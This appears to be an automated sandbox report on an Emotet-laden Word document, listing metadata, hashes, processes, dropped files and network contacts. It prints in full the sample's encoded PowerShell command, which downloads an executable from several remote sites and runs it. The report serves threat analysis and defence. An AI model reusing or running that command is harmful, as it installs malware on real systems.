File name: | Anhang-90326575-37.doc |
Full analysis: | https://app.any.run/tasks/c494c164-7517-42d4-86b4-55fba2bc860b |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 20, 2019, 11:33:03 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: synthesize ivory, Subject: Product, Author: Trycia Kris, Comments: drive Georgia, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 16 07:40:00 2019, Last Saved Time/Date: Thu May 16 07:40:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0 |
MD5: | D471A81D7869855E41717B65A9A388A4 |
SHA1: | D7BFEBF3826346410D2DA308344EA1C8060213D0 |
SHA256: | DD9076EAD2252FB957324F8DDED925F342FB7DA22D9519A902EF6B4F3DFC9FD4 |
SSDEEP: | 3072:U77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q5v00onx8p1Dbz53:U77HUUUUUUUUUUUUUUUUUUUT52VOs0oi |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserTypeLen: | 32 |
---|---|
CompObjUserType: | Microsoft Word 97-2003 Document |
Title: | synthesize ivory |
Subject: | Product |
Author: | Trycia Kris |
Keywords: | - |
Comments: | drive Georgia |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:05:16 06:40:00 |
ModifyDate: | 2019:05:16 06:40:00 |
Pages: | 1 |
Words: | 29 |
Characters: | 169 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Rolfson and Sons |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 197 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Kemmer |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3336 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Anhang-90326575-37.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3036 | PowErsHell -enC JABpADIANwA4ADAAMgA4AD0AJwB6ADgAMgA1ADUAMgAnADsAJAB2ADYAOAAyADAAMAAgAD0AIAAnADEANgA1ACcAOwAkAEsAOAAyADUANAA5ADcANgA9ACcAUgA4ADUANgA2ADkAOABfACcAOwAkAEgAMwA1ADEANwA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB2ADYAOAAyADAAMAArACcALgBlAHgAZQAnADsAJABNAF8ANgAyADkANwA9ACcAcgA2ADQANgBfADEAJwA7ACQAawAzADYAMgAwADQAXwA9ACYAKAAnAG4AJwArACcAZQB3AC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAAbgBlAHQALgB3AEUAQgBgAGMAYABsAGkAYABFAGAATgBUADsAJAB2ADMAMAA5ADcANAAxAD0AJwBoAHQAdABwAHMAOgAvAC8AYQBuAG4AaQBsAG8AcABwAG8AbgBlAG4ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB3AG8ANAB1ADMAMQAzADQALwBAAGgAdAB0AHAAOgAvAC8AdwBvAHIAZABwAHIAZQBzAHMALQAyADYAOQA5ADYAMQAtADgAMwA4ADQANQA4AC4AYwBsAG8AdQBkAHcAYQB5AHMAYQBwAHAAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AbgBjAGEAYQA2ADEALwBAAGgAdAB0AHAAOgAvAC8AagB1AGIAaQBsAGUAbgBnAHUAYQAuAGMAbwBtAC8AdwBwAC8AcABjAHAAZQBmADMAMwAxAC8AQABoAHQAdABwADoALwAvAGIAdQBzAGkAbgBlAHMAcwBmAGkAeABuAG8AdwAuAGMAbwBtAC8AdwBwAC8AMwBvAGcANwBtADMAMwA2ADEALwBAAGgAdAB0AHAAOgAvAC8AZABvAG0AbwB0AGkAYwBhAHYAaQBjAC4AYwBvAG0ALwBpAHQAYQB1AC8AdQA1AGEANAAxAC8AJwAuAFMAUABsAEkAVAAoACcAQAAnACkAOwAkAE0AMgA5ADkAMQA0ADYAPQAnAGkANwAzADgANwA4ADMANAAnADsAZgBvAHIAZQBhAGMAaAAoACQAUwA5ADIANAAxADUAIABpAG4AIAAkAHYAMwAwADkANwA0ADEAKQB7AHQAcgB5AHsAJABrADMANgAyADAANABfAC4AZABPAHcATgBMAE8AQQBEAGYAaQBsAEUAKAAkAFMAOQAyADQAMQA1ACwAIAAkAEgAMwA1ADEANwA1ACkAOwAkAE0AMgBfADgAOAAyADYAPQAnAGMAOQA4ADUAMABfACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASAAzADUAMQA3ADUAKQAuAEwAZQBOAGcAdABIACAALQBnAGUAIAAzADEANAAxADQAKQAgAHsALgAoACcASQAnACsAJwBuAHYAJwArACcAbwBrAGUALQBJAHQAZQBtACcAKQAgACQASAAzADUAMQA3ADUAOwAkAEIANAAwADUAOAAyAD0AJwBZADYAMwAwADEAMgAnADsAYgByAGUAYQBrADsAJABWADUANAA1ADIAOAA2AD0AJwBPADIAXwAyADQAOAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIANwA4ADkANgA5AD0AJwBoADEANQAzADYAOAA4ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREEB2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3036 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6TNJMR6GKVI3ZNTSP5BB.temp | — | |
MD5:— | SHA256:— | |||
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8A0379AD.wmf | wmf | |
MD5:6EF44D62D9FE23364E914AA5BEFB0BDE | SHA256:2F6A779A416283E8A1687802FD139615B3C4536FE7530E5E47E8C4D361C6A88A | |||
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84F6E543.wmf | wmf | |
MD5:92454FD3EE4CC004AF1C2FDDAE32D8D6 | SHA256:DE1112F0EA7E12423ED92EDA70C1651980753E6413E99E5FCCAB313D784DF6C2 | |||
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AD22D349.wmf | wmf | |
MD5:131A88B4443F82701D0C728E563E253A | SHA256:AD46CF038CA46D91F91DC20FCEC875F9AF67C7986FF76EC8D20352695456A30B | |||
3036 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
3336 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:17222E7BED955763CB75EBDA153E0074 | SHA256:EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882 | |||
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\659BB39E.wmf | wmf | |
MD5:30AABCA2BFE0107FA736FF4FB18D84DE | SHA256:8B6317E4B6B0195EDB88EE5CE6F8F59CF6863585B13B34494105CD28305B285B | |||
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:81D51546923F042BCDD0F73B7F856358 | SHA256:9F328411669124B2DA29BD49203275C498982AE12EA7DAAB36D76DCCF4756220 | |||
3336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FA89634.wmf | wmf | |
MD5:9E54587FC5613AAB2407E0865C1CCDD7 | SHA256:806A3C4E0412991580840BBF8F89825909042CDB92898612C138344E8E07EFFD |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3036 | PowErsHell.exe | 37.139.14.80:443 | annilopponen.com | Digital Ocean, Inc. | NL | unknown |
Domain | IP | Reputation |
---|---|---|
annilopponen.com |
| suspicious |